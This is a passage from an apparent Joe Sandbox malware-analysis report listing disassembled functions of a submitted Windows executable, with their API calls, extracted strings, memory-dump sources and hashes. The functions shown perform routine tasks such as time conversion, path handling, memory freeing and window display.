                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ClearVariant
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 4196654922-3505469590
                                                                                              • Opcode ID: a10d321b0b15d728490999ceccfb23ada98fb2e23210bc27a5e07c21d73880aa
                                                                                              • Instruction ID: 3a2493abb38fe5447bb1aa960d4d1e01332f09e03699c703aee67777db0ea4ce
                                                                                              • Opcode Fuzzy Hash: a10d321b0b15d728490999ceccfb23ada98fb2e23210bc27a5e07c21d73880aa
                                                                                              • Instruction Fuzzy Hash: 84617B71A00619EFDB14EFA4CC94AAEB7B8FF48314B14555DF51AB72A0DB30AD01CBA0
                                                                                              Function 00E7E07E Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_wcslen
                                                                                              • String ID: $</p>$</style>$<br>$<style>
                                                                                              • API String ID: 3746244732-3393513139
                                                                                              • Opcode ID: eddd3a8a0400240e438732cc0a0f13901409595b9d338114ade868d01a8627cd
                                                                                              • Instruction ID: e16452ad5244390c0c4e9bb951c69d7bdd4df4accfa60b697cc3b0db48c057ff
                                                                                              • Opcode Fuzzy Hash: eddd3a8a0400240e438732cc0a0f13901409595b9d338114ade868d01a8627cd
                                                                                              • Instruction Fuzzy Hash: C7513935B4131396DF309A14881277673B5AF6C749F98E099F98DBB3C1EB758D818390
                                                                                              Function 00E7E265 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E7E26C
                                                                                              • ShowWindow.USER32(?,00000000,00000038), ref: 00E7E294
                                                                                              • GetWindowRect.USER32(?,?), ref: 00E7E2D8
                                                                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E7E373
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00E7E394
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$H_prolog3_Rect
                                                                                              • String ID: RarHtmlClassName$gI
                                                                                              • API String ID: 950582801-2210054581
                                                                                              • Opcode ID: 1b3d7fb034ade3adcb38522f09976b091b691f6769cc9df19b3d189d42ce9ec3
                                                                                              • Instruction ID: f318afc60a00b5c37dbfb59d9edcaf7446f0f81894c42fbe2922a51b953b621a
                                                                                              • Opcode Fuzzy Hash: 1b3d7fb034ade3adcb38522f09976b091b691f6769cc9df19b3d189d42ce9ec3
                                                                                              • Instruction Fuzzy Hash: 42417D71901204EFDF11DFA8DD89AAE7BB9EF48300F049195F948BB261DB309D45CB60
                                                                                              Function 00E84D5F Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E84DDA,00E84D3D,00E84FDE), ref: 00E84D76
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E84D8C
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E84DA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive$p]
                                                                                              • API String ID: 667068680-2293571084
                                                                                              • Opcode ID: 0f0c7b73d556a4eae9c3a77e54febab5403cd4d3c36a3e0994ac751219c43bc1
                                                                                              • Instruction ID: bfee8a4a4fe5d13cda988e1bbcde52767f1add5eb4b68322b3f0e2fde6d96879
                                                                                              • Opcode Fuzzy Hash: 0f0c7b73d556a4eae9c3a77e54febab5403cd4d3c36a3e0994ac751219c43bc1
                                                                                              • Instruction Fuzzy Hash: 10F0AFB2601A23EB4B62BE755C857A72298EB85719710263ADB0DF22C0E6108C154791
                                                                                              Function 00E77818 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00E7783D
                                                                                                • Part of subcall function 00E7067E: GetVersionExW.KERNEL32(?), ref: 00E706AF
                                                                                              • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00E77860
                                                                                              • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00E77872
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00E77883
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E77893
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E778A3
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00E778DE
                                                                                              • __aullrem.LIBCMT ref: 00E77984
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: 5b21c5619ece7d3126f6b05fb645a1281578cb6221e63a177ca838da070ff760
                                                                                              • Instruction ID: 77b8075a46faacd0c98568728f442660364518f73ce3f03314cd0ba5c173ce4e
                                                                                              • Opcode Fuzzy Hash: 5b21c5619ece7d3126f6b05fb645a1281578cb6221e63a177ca838da070ff760
                                                                                              • Instruction Fuzzy Hash: 355115B15083059FD710DF65C88496BBBF9FB88714F108A2EF5DAE2211E734E948CB62
                                                                                              Function 00E82B26 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 291COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00E82B66
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                                • Part of subcall function 00E70BF3: _wcslen.LIBCMT ref: 00E70C03
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E82EDA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$DialogPathTemp
                                                                                              • String ID: $@set:user$\S$\S
                                                                                              • API String ID: 2172748170-2420096344
                                                                                              • Opcode ID: 32a22cb057d6be8f8fe87d09cc58242a14e9282eca9257a651c9dd8094725564
                                                                                              • Instruction ID: 39753aad4975407e030213efbfbbce2f81a74ab9b80f78b52735981dc01b4987
                                                                                              • Opcode Fuzzy Hash: 32a22cb057d6be8f8fe87d09cc58242a14e9282eca9257a651c9dd8094725564
                                                                                              • Instruction Fuzzy Hash: 80C146318012999EDF21EBA4D845BEDBBB4AF15344F0421EAE54DB3282DB705B89CF61
                                                                                              Function 00E70E49 Relevance: 10.7, APIs: 7, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E70E50
                                                                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00E70E85
                                                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00E70EC4
                                                                                              • _wcslen.LIBCMT ref: 00E70ED4
                                                                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00E70F51
                                                                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00E70F93
                                                                                              • _wcslen.LIBCMT ref: 00E70FA3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePath$_wcslen$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 840513527-0
                                                                                              • Opcode ID: 00b09547c62aebb43ff7f429b2139fece026f3987d5a4f4d5afca5b97b4ceaf3
                                                                                              • Instruction ID: 17e20f3e91a4b617e7f43e9121411d3469e8e81c310790a3a947d05074a6a1fb
                                                                                              • Opcode Fuzzy Hash: 00b09547c62aebb43ff7f429b2139fece026f3987d5a4f4d5afca5b97b4ceaf3
                                                                                              • Instruction Fuzzy Hash: 6C617971A00208EBCF15DFA9D885EEEBBB9EF84710F14A15AF418F7250DB349944CB61
                                                                                              Function 00E96239 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00E969AE,?,00000000,?,00000000,00000000), ref: 00E9627B
                                                                                              • __fassign.LIBCMT ref: 00E962F6
                                                                                              • __fassign.LIBCMT ref: 00E96311
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00E96337
                                                                                              • WriteFile.KERNEL32(?,?,00000000,00E969AE,00000000,?,?,?,?,?,?,?,?,?,00E969AE,?), ref: 00E96356
                                                                                              • WriteFile.KERNEL32(?,?,00000001,00E969AE,00000000,?,?,?,?,?,?,?,?,?,00E969AE,?), ref: 00E9638F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 2b8b32403be7fb7b098c087a1c5ee95bd10224ee27696834d5cfeba3e81755a7
                                                                                              • Instruction ID: acb13307695b34c4c65ba4ecd5825802c7c44df3df069d9b72b0cfa125007935
                                                                                              • Opcode Fuzzy Hash: 2b8b32403be7fb7b098c087a1c5ee95bd10224ee27696834d5cfeba3e81755a7
                                                                                              • Instruction Fuzzy Hash: B9518D71A00209AFDF10CFA9DC95AEEBBF8EB49310F14511BE956F7291E770A944CB60
                                                                                              Function 00E893C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E893F7
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00E893FF
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E89488
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00E894B3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E89508
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 51de46fea8e8665aa1978b9bdb5ddceece89de9d760318e8e035ea7ad14620c9
                                                                                              • Instruction ID: f757fc893455486148ff676e60e203632447734b4944d431301453ed7eaa5d67
                                                                                              • Opcode Fuzzy Hash: 51de46fea8e8665aa1978b9bdb5ddceece89de9d760318e8e035ea7ad14620c9
                                                                                              • Instruction Fuzzy Hash: 46416434E002089FCF10EF68C885AAE7BF5AF45318F189156E82D7B393D735A916CB91
                                                                                              Function 00E93554 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E93518: _free.LIBCMT ref: 00E93541
                                                                                              • _free.LIBCMT ref: 00E935A2
                                                                                                • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
                                                                                                • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
                                                                                              • _free.LIBCMT ref: 00E935AD
                                                                                              • _free.LIBCMT ref: 00E935B8
                                                                                              • _free.LIBCMT ref: 00E9360C
                                                                                              • _free.LIBCMT ref: 00E93617
                                                                                              • _free.LIBCMT ref: 00E93622
                                                                                              • _free.LIBCMT ref: 00E9362D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                                                              • Instruction ID: 9fe2f0c8d2399419386c7f806066c330fbe8e3d123a109884e96f9f01ac5e6bb
                                                                                              • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                                                              • Instruction Fuzzy Hash: C111B771540B04BBDF30BBB0CC46FCB77D9AF08700F816815B299B6153DA75AA058790
                                                                                              Function 00E91609 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E8C5A2,00E8C5A2,?,?,?,00E9185A,00000001,00000001,C5E85006), ref: 00E91663
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E9185A,00000001,00000001,C5E85006,?,?,?), ref: 00E916E9
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E917E3
                                                                                              • __freea.LIBCMT ref: 00E917F0
                                                                                                • Part of subcall function 00E9040E: RtlAllocateHeap.NTDLL(00000000,00E8535E,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?,?,?,?), ref: 00E90440
                                                                                              • __freea.LIBCMT ref: 00E917F9
                                                                                              • __freea.LIBCMT ref: 00E9181E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 3df27d877adc7bcd124b1ddfcfd39ae64d30d1b30b988c064d7e0a8ad0456876
                                                                                              • Instruction ID: 09d945d0d7712557473f961e2a5df40e0e46f77da79c488243771b69fa3c6ef0
                                                                                              • Opcode Fuzzy Hash: 3df27d877adc7bcd124b1ddfcfd39ae64d30d1b30b988c064d7e0a8ad0456876
                                                                                              • Instruction Fuzzy Hash: 1651D172600217AFEF259FA4CC81EBB77EAEB45754F2456AAFC04F6151EB34DC808660
                                                                                              Function 00E77AA3 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00E77B06
                                                                                                • Part of subcall function 00E7067E: GetVersionExW.KERNEL32(?), ref: 00E706AF
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00E77B2A
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00E77B44
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00E77B57
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00E77B67
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00E77B77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: a457731115a899b2545130b44c44aeddd814803bc40945d932d70a6fd4044211
                                                                                              • Instruction ID: 23e035432cdf171fcb408ebc2f139257b2c17418ac37704b3c0f240b3bc35238
                                                                                              • Opcode Fuzzy Hash: a457731115a899b2545130b44c44aeddd814803bc40945d932d70a6fd4044211
                                                                                              • Instruction Fuzzy Hash: 3F4105761082059FC704DFA9C88499BB7F8BF98714F04991BF999D7220E730D948CBAA
                                                                                              Function 00E7F33B Relevance: 9.1, APIs: 6, Instructions: 102timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,522FB702,?,?,?,?,00E9AA27,000000FF), ref: 00E7F38A
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,00E9AA27,000000FF), ref: 00E7F399
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00E9AA27,000000FF), ref: 00E7F3A7
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00E9AA27,000000FF), ref: 00E7F3B5
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,00E9AA27,000000FF), ref: 00E7F3D0
                                                                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,00E9AA27,000000FF), ref: 00E7F3FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File$Format$DateLocalSpecific
                                                                                              • String ID:
                                                                                              • API String ID: 909090443-0
                                                                                              • Opcode ID: 979ce0adf7a8eafd26eae93815e46414b633485cd26bdf8b2a27ccfde23a733f
                                                                                              • Instruction ID: 7bf0b73c0f612b60b23757202563e6292eb47a2e6afc7affb8e9bfa0ebbe267d
                                                                                              • Opcode Fuzzy Hash: 979ce0adf7a8eafd26eae93815e46414b633485cd26bdf8b2a27ccfde23a733f
                                                                                              • Instruction Fuzzy Hash: CE311DB2501188AFDB11EFA5DC45EEF77BCFB19754F00412AF905E6141EB74AA08CB60
                                                                                              Function 00E82F8D Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 350COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00E831A4
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E834F2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$H_prolog3_
                                                                                              • String ID: .lnk$0$lnk$S
                                                                                              • API String ID: 2000020936-3846212212
